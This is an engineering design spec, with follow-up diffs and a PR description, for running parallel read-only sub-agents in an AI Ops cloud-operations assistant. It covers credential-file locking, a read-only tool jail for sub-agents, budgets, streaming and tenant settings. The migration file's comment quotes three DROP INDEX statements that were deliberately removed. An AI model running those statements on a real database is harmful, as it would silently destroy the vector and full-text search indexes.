+**Status:** Approved for planning
+**Surface:** Interactive chat (`planning-agent.ts`) first; Agent Ops reuses the runtime later.
+
+## Problem
+
+AI Ops chat runs take ~10 minutes. `planning-agent.ts` is a strictly serial state machine:
+
+```
+memory_recall → planner → (generate → guard → tools → generate)* → reflect → revise* → final → memory_save
+```
+
+Every lap costs one streaming LLM call plus one tool execution, and the message history grows
+monotonically, so late laps are markedly slower than early ones. With `MAX_ITERATIONS = 30` a
+seven-step plan realistically burns 15–25 laps.
+
+Four workload shapes contribute, confirmed with the user:
+
+1. Wide fan-out (many accounts × regions × services)
+2. Deep sequential investigation
+3. Slow individual AWS calls
+4. Long final-report generation
+
+No single lever fixes all four. This design ships two complementary layers and explicitly defers a
+third.
+
+## Root causes identified in the current code
+
+### Serialization is prompt-enforced, not structural
+
+`planning-agent.ts:404` instructs the executor:
+
+> "Execute exactly the current step — do not skip ahead or bundle future steps into a single call."
+
+LangGraph's `ToolNode` already executes multiple `tool_calls` from one AI message concurrently. The
+prompt suppresses that free parallelism, converting an N-way independent sweep into N serial laps
+whose only purpose is emitting the next single command. `planning-agent.ts:292` compounds this by
+telling the planner to merge related read-only queries into one *step*, while the executor prompt
+then forbids merging them into one *turn*.
+
+### Context bloat
+
+Raw tool outputs accumulate in the orchestrator's message list. `prepareContext` compacts, but
+compaction itself costs an extra LLM call and loses fidelity.
+
+### Concurrency is currently unsafe (blocker)
+
+`session-manager.ts:159-172` performs an unlocked read-modify-write on a shared per-tenant
+credentials file:
+
+```
+Agent 1: read  → {profileA}
+Agent 2: read  → {profileA}
+Agent 1: write → {profileA, profileB}
+Agent 2: write → {profileA, profileC}   ← profileB silently lost
+```
+
+The agent holding the lost profile then fails with "The config profile could not be found". This is
+latent today because nothing runs concurrently; it becomes a routine failure the moment
+`get_aws_credentials` is parallelized (which every multi-account fan-out does).
+
+Additionally `assumeRoleForAccount` (`aws-credentials-tool.ts:44`) uses `DurationSeconds: 900`.
+Credentials acquired at minute 0 expire at minute 15 — long runs already risk this, and fan-out
+makes long runs more likely.
+
+### CloudFront caps silent periods at 60s
+
+`infra/compute/index.ts:962` sets `originReadTimeout: 60` while the ALB is at `idleTimeout: 1200`
+(`infra/compute/index.ts:788`). A 10-minute run survives today only because streamed tokens
+continuously reset the 60s timer. A fan-out phase where sub-agents think silently for 90s will drop
+the connection. Progress heartbeats are therefore a correctness requirement, not a UX nicety.
+
+## Approaches considered
+
+### A. Intra-turn tool parallelism (no sub-agents) — **adopted**
+
+Remove the anti-batching prompt rules; let one AI turn emit N `tool_calls`; add a bounded semaphore
+around `ToolNode`.
+
+- Cost is *negative* — fewer LLM laps means cheaper and faster.
+- HIL survives untouched: `pendingToolCallsOf` (`guard.ts:16`), the guard's batched risk assessment
+  (`guard.ts:105`), and `approval-batch-card.tsx` already handle multi-call turns.
+- Does not address context bloat, deep investigation, or report generation.
+
+### B. Sub-agent as a tool — the Claude Code `Task` pattern — **adopted**
+
+A `dispatch_agent` tool. The orchestrator emits several in one turn; `ToolNode` runs them
+concurrently; each spawns a lean read-only ReAct loop with its own context, returning one compressed
+findings report instead of dozens of raw tool outputs.
+
+- The primary win is **context isolation**, not only parallelism. Keeping the orchestrator's history
+  small is what also helps the deep-sequential and report-generation cases.
+- Minimal graph surgery — it is a tool, not a topology change.
+- Cost: 3–8× tokens on fan-out tasks, which the budget governor bounds.
+
+### C. LangGraph `Send` map-reduce supervisor — **rejected**
+
+Planner marks steps parallelizable; a fan-out node emits `Send()` to N executor branches; a reduce
+node merges.
+
+- Only approach in which sub-agents could safely mutate, since each branch is independently
+  interruptible.
+- But `ReflectionState`/`graphState` has no reducers for concurrent writes to `messages`, `plan`, or
+  `toolResults`; streaming attribution via `langgraph_node` breaks with N identical branches; and
+  `iterationCount` becomes meaningless. This is a rewrite of the state layer.
+- Rejected because every real fan-out workload in the product (audits, inventories, right-sizing
+  sweeps, security reviews) is read-only. Parallel mutation is a problem we do not have.
+
+**Decision: ship A and B together.** A alone leaves context bloat; B alone still serializes inside
+each sub-agent.
+
+## Architecture
+
+```
+Orchestrator (planning-agent — topology unchanged)
+  memory_recall → planner → generate ⇄ guard ⇄ tools → reflect ⇄ revise → final
+                                          │
+                                          ├── execute_command      (parallel — Layer A)
+                                          ├── execute_command      (parallel — Layer A)
+                                          └── dispatch_agent ──────────────┐  (Layer B)
+                                                                           │
+                                    ┌──────────────────────────────────────┘
+                                    ▼  (ephemeral, non-checkpointed, read-only)
+                            Sub-agent ReAct loop
+                            generate → tools → generate   (≤ 8 laps)
+                                    ▼
+                            compressed findings report (~1500 tokens)
+```
+
+### Why one sub-agent per tool call
+
+`dispatch_agent` takes a single sub-agent spec, not an array. The orchestrator emits N calls in one
+turn and `ToolNode`'s existing parallelism *is* the fan-out. This avoids a second concurrency
+mechanism and gives each sub-agent its own tool card in the UI for free.
+
+### Why a plain loop, not a compiled sub-graph
+
+Sub-agents are ephemeral and non-resumable. A checkpointer would add a Postgres write per lap for no
+benefit. The sub-agent is a plain `while` loop over `model.invoke` + tool execution.
+
+## Components
+
+### 1. `session-manager` concurrency fix (prerequisite)
+
+**File:** `apps/web-ui/lib/agent/session-manager.ts`
+
+- Per-tenant async mutex serializing the read-modify-write in `createSessionProfile`.
+- Atomic write: write to a temp file in the same directory, then `fs.rename`.
+- Mutex map keyed by resolved credentials-file path, so the legacy shared-file path is covered too.
+- Lazy credential refresh: `get_aws_credentials` re-assumes the role when the cached profile is
+  within 120 s of its `expiresAt` rather than handing back a profile that will expire mid-command.
+  Pre-existing weakness (`DurationSeconds: 900` vs. 10-minute runs), but fan-out makes long runs more
+  likely, so it lands here.
+
+### 2. Layer A — parallel tool calls
+
+**Files:** `apps/web-ui/lib/agent/planning-agent.ts`, `apps/web-ui/lib/agent/fast-agent.ts`
+
+- Replace the executor's "do not bundle" rule with explicit guidance to batch **independent
+  read-only** calls into one turn, while keeping dependent calls sequential and keeping mutations one
+  at a time.
+- Reviser prompt gets the same treatment.
+- Wrap `ToolNode` invocation in a bounded semaphore (`TOOL_CONCURRENCY`, default 6) so a 45-call turn
+  does not open 45 simultaneous AWS CLI subprocesses.
+
+The guard, approval routing, and the batch approval card need no changes.
+
+### 3. Layer B — `dispatch_agent`
+
+**New file:** `apps/web-ui/lib/agent/subagent.ts`
+
+Tool contract:
+
+```ts
+dispatch_agent({
+  role: string,           // "EC2 inventory auditor for account 1234"
+  task: string,           // full standalone brief — the sub-agent sees NO parent history
+  expectedOutput: string  // "instance IDs with CPU <5% over 14d, with evidence"
+}) → string               // structured findings report, hard-capped (see SUBAGENT_REPORT_MAX_CHARS)
+```
+
+The report cap is enforced in characters, not tokens, so it is deterministic and testable:
+`SUBAGENT_REPORT_MAX_CHARS = 6000` (≈1500 tokens). Over-length reports are truncated with an
+explicit `[TRUNCATED — report exceeded cap]` marker, reusing `truncateOutput` from `agent-shared.ts`.
+
+The tool description explicitly requires `task` to be self-contained. Under-specified sub-agent
+briefs are the dominant failure mode reported in Anthropic's multi-agent research: sub-agents
+duplicate each other's work or return unusable fragments.
+
+Sub-agent internals:
+
+- Reuses the orchestrator's `createAgentModels(modelConfig)` instances — they are stateless per
+  invoke, so no new model construction per sub-agent.
+- Own message list seeded only with its system prompt and `task`.
+- Read-only tool subset (see §4).
+- `SUBAGENT_MAX_ITERATIONS = 8`, `SUBAGENT_TIMEOUT_MS = 180_000`.
+- Returns a structured report: findings, evidence (resource IDs, metric values), and an explicit
+  "could not determine" section, truncated per `SUBAGENT_REPORT_MAX_CHARS`.
+
+### 4. The read-only jail
+
+Two independent layers:
+
+1. **Filtered tool list.** Sub-agents receive read-only tools only. Excluded: `dispatch_agent`
+   (depth cap = 1), `ask_user` (no human reachable from inside a tool call), `write_file`,
+   `edit_file`, `write_file_to_s3`.
+2. **Runtime interception.** Every sub-agent tool call is re-checked through `classifyTool`
+   (`tool-classifier.ts`). A mutative or unknown-named tool is refused with: *"You cannot mutate
+   state. Report the recommended change in your findings; the orchestrator will execute it under
+   human approval."*
+
+Layer 2 matters because MCP tools with unrecognized names hit `classifyTool`'s fail-closed default.
+In the orchestrator that default means "ask the human"; inside a sub-agent, where no human is
+reachable, it must mean "block".
+
+**Consequence: the existing HIL story is unchanged.** Mutations only ever occur on the single
+guarded orchestrator path, so `guard.ts`, `gate-routing.ts`, and `interruptBefore:
+["approval_gate"]` need no modification.
+
+### 5. Budget governor
+
+**New file:** `apps/web-ui/lib/agent/subagent-budget.ts`
+
+Run-scoped, in-memory, keyed by `threadId`. A run executes on a single ECS replica, so in-process
+state is sufficient; no distributed coordination.
+
+| Control | Default | Env override |
+|---|---|---|
+| Max concurrent sub-agents | 3 | `SUBAGENT_MAX_CONCURRENCY` |
+| Max sub-agents per run | 8 | `SUBAGENT_MAX_PER_RUN` |
+| Max sub-agent tokens per run | 400 000 | `SUBAGENT_MAX_TOKENS_PER_RUN` |
+| Max iterations per sub-agent | 8 | `SUBAGENT_MAX_ITERATIONS` |
+| Sub-agent timeout | 180 s | `SUBAGENT_TIMEOUT_MS` |
+
+- Tokens metered from `usage_metadata` on each sub-agent model response.
+- **On exhaustion `dispatch_agent` does not throw.** It returns *"Sub-agent budget exhausted; perform
+  this work yourself, serially."* The run degrades to current behaviour rather than failing.
+- Bedrock `ThrottlingException` → exponential backoff retry inside the sub-agent loop. The low
+  concurrency cap is the primary defence.
+- Budget entries are removed when the run ends, and are bounded by a max-entries LRU so an abandoned
+  run cannot leak memory.
+
+The whole of Layer B is gated by `SUBAGENTS_ENABLED` (default off at first deploy), matching the
+existing `WORKING_MEMORY_ENABLED` / `EPISODIC_MEMORY_ENABLED` convention. Per-tenant configurability
+is deliberately out of scope — bounded defaults were chosen over configurability.
+
+### 6. Streaming, UI, and heartbeat
+
+Sub-agent tokens are **not** streamed into the transcript. Three concurrent token streams interleaved
+into one linear chat column are unreadable, and the sub-agent's narration was never the deliverable —
+it is the same step-ceremony prose the executor prompt already suppresses.
+
+**New stream part** (`apps/web-ui/app/api/chat/stream-parts.ts`):
+
+```ts
+{
+  type: 'data-subagent',
+  id: `subagent-${subagentId}`,
+  data: { id, role, task, status: 'running' | 'done' | 'failed',
+          toolCount, tokensIn, tokensOut, summary?: string }
+}
+```
+
+Plumbing: sub-agent model invocations are tagged via `.withConfig({ metadata: { subagent_id } })`.
+`route.ts` already discriminates on `event.metadata?.langgraph_node`; it gains a branch routing any
+event carrying `subagent_id` to a `data-subagent` part instead of the transcript. No side channel is
+required.
+
+**Heartbeat:** a `data-subagent` tick is emitted every 15 s while any sub-agent is in flight.
+Tool-completion events alone are insufficient — a single sub-agent thinking for 90 s would exceed
+CloudFront's 60 s `originReadTimeout`.
+
+**Client:** `run-state.ts` gains a `case 'data-subagent'` and a `subagents: Map<string, SubagentState>`
+field. New `apps/web-ui/components/agent/chat/subagent-card.tsx` renders collapsed cards:
+
+```
+  ⏳ Auditing account 1111 (Prod)      6 tools · 12.4k tokens
+  ✅ Auditing account 2222 (Staging)   4 tools ·  8.1k tokens
+  ⏳ Auditing account 3333 (Dev)       9 tools · 15.2k tokens
+```
+
+### 7. Expandable cards and transcript persistence
+
+Cards expand to show that sub-agent's full transcript after it completes.
+
+Stream data parts are **not** persisted today — chat history is rebuilt from the LangGraph
+checkpointer, and `build-chat-transcript.ts` handles only text and tool-invocation parts. Live
+in-session expansion therefore works from client state, but expansion after a page reload requires
+storage.
+
+The full transcript must **not** be placed in the `dispatch_agent` `ToolMessage` — that message
+enters the orchestrator's context and would defeat the entire point of context isolation.
+
+**New Prisma model** (`libs/prisma/schema.prisma`), following the `AgentOpsEvent` TTL pattern:
+
+```prisma
+model AgentSubagentRun {
+  id         String   @id @default(cuid())
+  tenantId   String
+  threadId   String
+  subagentId String
+  role       String
+  task       String
+  status     String   // running|done|failed
+  toolCount  Int      @default(0)
+  tokensIn   Int      @default(0)
+  tokensOut  Int      @default(0)
+  summary    String?
+  transcript Json?    // full message list — fetched on demand, never sent to the orchestrator
+  createdAt  DateTime @default(now())
+  expiresAt  DateTime // 30-day TTL, matching ChatMessage
+
+  @@index([tenantId, threadId, createdAt])
+  @@index([expiresAt])
+  @@map("agent_subagent_runs")
+}
+```
+
+Written through the repository pattern (`apps/web-ui/lib/db/repositories/agent/`) using
+`getTenantClient(tenantId)`. Fetched on expand via `GET /api/chat/subagents/[threadId]`, guarded by
+`authorize('read', 'AIOps')` and scoped to the caller's tenant.
+
+> **Migration note:** per `prisma-migrate-dev-drops-raw-sql-indexes`, audit the generated migration
+> SQL for silent `DROP INDEX` statements against the existing HNSW/GIN indexes before applying.
+
+## Error handling
+
+Follows the existing never-crash-the-run convention throughout `planning-agent.ts`:
+
+| Failure | Behaviour |
+|---|---|
+| Sub-agent model/provider error | Returns an error report string; run continues |
+| Sub-agent hits iteration cap | Returns partial findings marked incomplete |
+| Sub-agent exceeds timeout | Aborted; returns partial findings marked incomplete |
+| One sub-agent fails | Siblings unaffected — each is an independent tool call |
+| All sub-agents fail | Orchestrator sees N error reports and may retry serially |
+| Budget exhausted | Graceful degradation message, not an error |
+| Transcript persistence fails | Logged and swallowed — never blocks the run |
+
+## Testing
+
+**Unit (Vitest, `apps/web-ui`):**
+
+- Budget governor: semaphore bounds concurrency; exhaustion returns the degradation message rather
+  than throwing; per-run counters reset.
+- Read-only jail: mutative tool rejected; unknown-named tool rejected (fail-closed); read-only tool
+  permitted.
+- Report truncation at the token cap, with marker.
+- Sub-agent timeout returns partial findings.
+- `stream-parts`: `data-subagent` part construction.
+- `run-state`: `data-subagent` reducer builds and updates the map correctly.
+
+**Concurrency:**
+
+- `createSessionProfile` under `Promise.all` of 10 concurrent writes — all 10 profiles must survive.
+  *This test fails against the current implementation and is the regression test for the prerequisite
+  fix.*
+
+**Integration:**
+
+- Mocked model emitting three `dispatch_agent` calls in one turn; assert concurrent execution,
+  correct merge of the three reports, and that no raw sub-agent tool output entered the orchestrator's
+  message list.
+
+**Not covered:** E2E. A multi-minute agent run is too slow and flaky for the Playwright suite.
+
+## Measurement
+
+`llmAuditLog` (`agent-shared.ts:368`) already records per-node latency and token counts but is never
+aggregated. A per-run summary line is added — total wall time split by node, LLM time vs tool time,
+sub-agent count and token spend — logged at run end.
+
+A baseline is captured **before** Layer A ships, so the contribution of each layer is attributable
+rather than assumed.
+
+## Sequencing
+
+| # | Work | Gate |
+|---|---|---|
+| 0 | `session-manager` mutex + atomic write + concurrency test | Blocker for 2 and 3 |
+| 1 | Per-run timing summary from `llmAuditLog` | Baseline before changes |
+| 2 | Layer A — parallel tool calls | Measure against baseline |
+| 3 | Layer B — `dispatch_agent`, jail, budget governor | Behind `SUBAGENTS_ENABLED` |
+| 4 | `data-subagent` streaming, heartbeat, collapsed cards | With 3 |
+| 5 | `AgentSubagentRun` persistence + expand-after-reload | With 4 |
+
+## Explicitly out of scope
+
+- **Prompt caching.** Deferred to future work by user decision. Noted here because the executor
+  system prompt is large and byte-identical across every lap, and `createAgentModels` sets no cache
+  configuration — it is likely the single largest remaining win for the deep-sequential case, where
+  parallelism is structurally impossible.
+- **Parallel mutations** (approach C). Requires a state-reducer rewrite; no current workload needs it.
+- **Recursive sub-agents.** Depth capped at 1, matching Claude Code. Depth 2+ makes cost and latency
+  unpredictable and debugging impractical.
+- **Agent debate / critic panels.** The reflector already fills the critique role.
+- **Shared scratchpad files between sub-agents.** Reintroduces exactly the race condition being fixed
+  in step 0.
+- **Per-tenant budget configuration UI.** Bounded defaults were chosen over configurability.
+- **Agent Ops adoption.** The runtime is written to be surface-agnostic, but wiring it into
+  `executor-graphs.ts` is separate work.
+- **Raising `DurationSeconds` beyond 900 s.** The refresh-on-near-expiry fix in step 0 covers the
+  failure mode without widening the credential lifetime.

--- a/docs/superpowers/specs/2026-07-26-aiops-subagent-orchestration-design.md
+++ b/docs/superpowers/specs/2026-07-26-aiops-subagent-orchestration-design.md
@@ -226,14 +226,6 @@ guarded orchestrator path, so `guard.ts`, `gate-routing.ts`, and `interruptBefor
 Run-scoped, in-memory, keyed by `threadId`. A run executes on a single ECS replica, so in-process
 state is sufficient; no distributed coordination.
 
-| Control | Default | Env override |
-|---|---|---|
-| Max concurrent sub-agents | 3 | `SUBAGENT_MAX_CONCURRENCY` |
-| Max sub-agents per run | 8 | `SUBAGENT_MAX_PER_RUN` |
-| Max sub-agent tokens per run | 400 000 | `SUBAGENT_MAX_TOKENS_PER_RUN` |
-| Max iterations per sub-agent | 8 | `SUBAGENT_MAX_ITERATIONS` |
-| Sub-agent timeout | 180 s | `SUBAGENT_TIMEOUT_MS` |
-
 - Tokens metered from `usage_metadata` on each sub-agent model response.
 - **On exhaustion `dispatch_agent` does not throw.** It returns *"Sub-agent budget exhausted; perform
   this work yourself, serially."* The run degrades to current behaviour rather than failing.
@@ -242,9 +234,52 @@ state is sufficient; no distributed coordination.
 - Budget entries are removed when the run ends, and are bounded by a max-entries LRU so an abandoned
   run cannot leak memory.
 
-The whole of Layer B is gated by `SUBAGENTS_ENABLED` (default off at first deploy), matching the
-existing `WORKING_MEMORY_ENABLED` / `EPISODIC_MEMORY_ENABLED` convention. Per-tenant configurability
-is deliberately out of scope — bounded defaults were chosen over configurability.
+### 5a. Per-tenant configuration
+
+The budget controls are tenant-configurable from AI Ops settings. **They are not purely
+tenant-controlled**, because web-ui runs as a shared ECS task: a tenant setting concurrency to 50
+would saturate the container's event loop for every other tenant on that replica and flood their
+Bedrock account with `ThrottlingException`.
+
+**Resolution order** — `effective = clamp(tenantConfig ?? default, MIN, envCeiling)`:
+
+| Control | Default | Min | Env ceiling |
+|---|---|---|---|
+| `enabled` | `false` | — | `SUBAGENTS_ENABLED` (absolute kill-switch) |
+| `maxConcurrentSubagents` | 3 | 1 | `SUBAGENT_MAX_CONCURRENCY` (default 6) |
+| `maxSubagentsPerRun` | 8 | 1 | `SUBAGENT_MAX_PER_RUN` (default 16) |
+| `maxSubagentTokensPerRun` | 400 000 | 50 000 | `SUBAGENT_MAX_TOKENS_PER_RUN` (default 1 000 000) |
+| `subagentMaxIterations` | 8 | 2 | `SUBAGENT_MAX_ITERATIONS` (default 16) |
+| `subagentTimeoutMs` | 180 000 | 30 000 | `SUBAGENT_TIMEOUT_MS` (default 300 000) |
+
+`SUBAGENTS_ENABLED=false` is absolute: tenant config cannot re-enable the feature. The separate
+`enabled` field exists so `maxSubagentsPerRun: 0` is never the accidental off-switch; the minimum of
+1 makes that explicit.
+
+Clamping happens **server-side on read**, not only on write, so a config row written before a ceiling
+was lowered cannot exceed the new ceiling.
+
+**Storage:** `TenantConfigService` under config key `aiops-subagents`, matching the existing
+`discovery-cron` / `mcp-servers` convention. No new table.
+
+**API:** `GET`/`PUT /api/settings/aiops`, modelled directly on
+`apps/web-ui/app/api/settings/discovery/route.ts`:
+
+- `authorize('read' | 'update', 'Agent')` — `Agent` already maps to the `AIOps` module
+  (`rbac/types.ts:33`), so no RBAC changes are needed.
+- Zod 4 schema validating and clamping the payload; `GET` returns effective values plus the
+  ceilings, so the UI can show what a slider is bounded by and why.
+- `AuditService.logUserAction` on save, matching the discovery route.
+
+**UI:** `apps/web-ui/components/settings/aiops-settings.tsx`, following `discovery-settings.tsx` and
+`scheduler-settings.tsx` — React Hook Form + Zod resolver, a typed TanStack Query hook in
+`lib/queries/settings.ts` keyed via `query-keys.ts`, sonner toast on save. When the platform
+kill-switch is off, the panel renders read-only with an explanatory note rather than silently
+accepting values that will not take effect.
+
+**Wiring:** resolved once during `createReflectionGraph` (alongside the existing `getSkillContent`
+lookup) and passed into the sub-agent runtime via `GraphConfig` — not re-fetched per
+`dispatch_agent` call, which would add a DB round-trip to every dispatch.
 
 ### 6. Streaming, UI, and heartbeat
 
@@ -349,6 +384,8 @@ Follows the existing never-crash-the-run convention throughout `planning-agent.t
   permitted.
 - Report truncation at the token cap, with marker.
 - Sub-agent timeout returns partial findings.
+- Budget resolution: tenant value below MIN clamps up; above the env ceiling clamps down; absent
+  tenant config falls back to defaults; `SUBAGENTS_ENABLED=false` overrides a tenant `enabled: true`.
 - `stream-parts`: `data-subagent` part construction.
 - `run-state`: `data-subagent` reducer builds and updates the map correctly.
 
@@ -383,8 +420,9 @@ rather than assumed.
 | 1 | Per-run timing summary from `llmAuditLog` | Baseline before changes |
 | 2 | Layer A — parallel tool calls | Measure against baseline |
 | 3 | Layer B — `dispatch_agent`, jail, budget governor | Behind `SUBAGENTS_ENABLED` |
-| 4 | `data-subagent` streaming, heartbeat, collapsed cards | With 3 |
-| 5 | `AgentSubagentRun` persistence + expand-after-reload | With 4 |
+| 4 | AI Ops settings: `/api/settings/aiops` + `aiops-settings.tsx` | With 3 |
+| 5 | `data-subagent` streaming, heartbeat, collapsed cards | With 3 |
+| 6 | `AgentSubagentRun` persistence + expand-after-reload | With 5 |
 
 ## Explicitly out of scope
 
@@ -398,7 +436,6 @@ rather than assumed.
 - **Agent debate / critic panels.** The reflector already fills the critique role.
 - **Shared scratchpad files between sub-agents.** Reintroduces exactly the race condition being fixed
   in step 0.
-- **Per-tenant budget configuration UI.** Bounded defaults were chosen over configurability.
 - **Agent Ops adoption.** The runtime is written to be surface-agnostic, but wiring it into
   `executor-graphs.ts` is separate work.
 - **Raising `DurationSeconds` beyond 900 s.** The refresh-on-near-expiry fix in step 0 covers the

--- a/libs/prisma/migrations/20260726124500_add_agent_subagent_runs/migration.sql
+++ b/libs/prisma/migrations/20260726124500_add_agent_subagent_runs/migration.sql
@@ -1,0 +1,42 @@
+-- AgentSubagentRun — one row per dispatch_agent sub-agent so a collapsed card can be
+-- expanded after a page reload. Secrets are redacted at the persistence boundary
+-- (apps/web-ui/lib/agent/subagent-redact.ts) before any transcript reaches this table.
+--
+-- AUDIT NOTE: `prisma migrate diff` emitted three unrelated statements ahead of this
+-- table and they were deleted by hand, as the repo's history requires:
+--     DROP INDEX "agent_memories_embedding_hnsw";
+--     DROP INDEX "idx_inventory_search_vector";
+--     DROP INDEX "idx_kb_document_chunks_embedding";
+-- Those indexes are created by raw SQL (HNSW / GIN) and are invisible to the Prisma
+-- datamodel, so every generated migration treats them as drift. Dropping them would
+-- silently destroy vector search and inventory full-text search — the same damage
+-- 20260725120000_restore_raw_sql_indexes exists to repair. Do not re-add them.
+
+-- CreateTable
+CREATE TABLE "agent_subagent_runs" (
+    "id" TEXT NOT NULL,
+    "tenantId" TEXT NOT NULL,
+    "threadId" TEXT NOT NULL,
+    "subagentId" TEXT NOT NULL,
+    "role" TEXT NOT NULL,
+    "task" TEXT NOT NULL,
+    "status" TEXT NOT NULL,
+    "toolCount" INTEGER NOT NULL DEFAULT 0,
+    "tokensIn" INTEGER NOT NULL DEFAULT 0,
+    "tokensOut" INTEGER NOT NULL DEFAULT 0,
+    "summary" TEXT,
+    "transcript" JSONB,
+    "createdAt" TIMESTAMP(3) NOT NULL DEFAULT CURRENT_TIMESTAMP,
+    "expiresAt" TIMESTAMP(3) NOT NULL,
+
+    CONSTRAINT "agent_subagent_runs_pkey" PRIMARY KEY ("id")
+);
+
+-- CreateIndex
+CREATE INDEX "agent_subagent_runs_tenantId_threadId_createdAt_idx" ON "agent_subagent_runs"("tenantId", "threadId", "createdAt");
+
+-- CreateIndex
+CREATE INDEX "agent_subagent_runs_expiresAt_idx" ON "agent_subagent_runs"("expiresAt");
+
+-- CreateIndex
+CREATE UNIQUE INDEX "agent_subagent_runs_tenantId_threadId_subagentId_key" ON "agent_subagent_runs"("tenantId", "threadId", "subagentId");

--- a/libs/prisma/schema.prisma
+++ b/libs/prisma/schema.prisma
@@ -627,6 +627,36 @@ model ChatMessage {
   @@map("chat_messages")
 }
 
+// AgentSubagentRun — one row per dispatch_agent sub-agent, so a collapsed card
+// can be expanded after a page reload. The transcript lives here and NEVER in
+// the orchestrator's message list: putting it there would defeat the context
+// isolation that makes sub-agents worthwhile.
+//
+// Written through SubagentRunPostgresRepository, which redacts secrets before
+// the row is persisted (see lib/agent/subagent-redact.ts) — aws_read permits
+// `lambda get-function-configuration`, whose Environment.Variables are plaintext.
+model AgentSubagentRun {
+  id         String   @id @default(cuid())
+  tenantId   String
+  threadId   String
+  subagentId String
+  role       String
+  task       String
+  status     String // running|done|failed
+  toolCount  Int      @default(0)
+  tokensIn   Int      @default(0)
+  tokensOut  Int      @default(0)
+  summary    String?
+  transcript Json?
+  createdAt  DateTime @default(now())
+  expiresAt  DateTime // 30-day TTL, matching ChatMessage
+
+  @@unique([tenantId, threadId, subagentId])
+  @@index([tenantId, threadId, createdAt])
+  @@index([expiresAt])
+  @@map("agent_subagent_runs")
+}
+
 // ChatSession — thread metadata for AI agent chat sessions
 // Tracks thread title, owner, timestamps for sidebar listing
 model ChatSession {


### PR DESCRIPTION
## Summary

This branch delivers the AI Ops **sub-agent orchestration** feature end to end, then hardens it through several rounds of live testing, and finishes by making the whole AI Ops behavior surface **tenant/UI-driven with zero env-var dependencies**.

### Sub-agent orchestration (Claude Code `Task` pattern)
- `dispatch_agent` fan-out tool on the planning graph: parallel, strictly read-only sub-agents with their own context, returning compressed reports; per-run budget ledger (concurrency semaphore + worst-case token reservation, clamped tenant config with platform ceilings).
- Sub-agents have **no shell**: AWS access only via the structured `aws_read` tool (positive allowlist on service/operation/flags/values, argv built in code, `shell: false`), tenant-pinned `AWS_CONFIG_FILE`/credentials file, no ambient-credential fallback.
- Secrets redacted at the source before reports reach the orchestrator context, `chat_messages`, checkpoints, or the new `agent_subagent_runs` table (30-day TTL; collapsed cards expandable after reload).
- Collapsed sub-agent cards in the run rail: live tool/token counters, current-action line, elapsed timer, budget denominator, post-stream-death reconciliation from the store; 15s heartbeat keeps CloudFront's 60s origin timeout at bay.

### Stream-corruption root-cause fix
Sub-agent model calls run inside ToolNode, so their `on_chat_model_*` events drove the chat route's single-threaded text-part state machine — concurrent fan-outs corrupted part ids ('text-delta for missing text part'), killed the stream, and leaked narration into the transcript. They're now tagged (`SUBAGENT_MODEL_TAG`) and filtered like guard runs, with usage still billed.

### UI-driven configuration (no env vars)
- New `aiops-features` tenant config + settings card: chat triage, working/episodic/procedural memory, memory reconciliation, autonomous skill creation, synthesis thresholds, and the run iteration cap — all edited from the AI Ops console (header ⋮ → AI Ops settings), clamped on read/write, 30s per-tenant cache. Defaults preserve prior behavior exactly.
- `SUBAGENTS_ENABLED` inverted to an emergency-off only; the tenant toggle governs.

### Agent discipline & observability
- `CORE_PRINCIPLES` resource-utilization mandate (skills-first, memory-as-data, KB-before-'not-found', purpose-built tools) applied to every graph and model.
- Triage/auto-select treat skill matching as the default; active skill (incl. auto-selected) surfaced in the rail; skill-load logs include injected char counts.
- Guard's deterministic allowlist now covers platform-internal read-only tools, so its LLM risk batch fires only for genuine mutations/unknowns.
- Composer fully locks (except Stop) while a run streams.

## Test plan
- `cd apps/web-ui && bun run test`: all suites touched by this branch pass (~470 tests incl. 100+ new); the 16 failing files are the documented pre-existing mock-harness/integration failures, byte-identical to the `master-v1` baseline.
- Live-verified in dev across multiple runs: organic planner-driven fan-out, budget degrade→serial recovery, transcript persistence/reload, redaction, kill-switch, settings round-trips.

🤖 Generated with [Claude Code](https://claude.com/claude-code)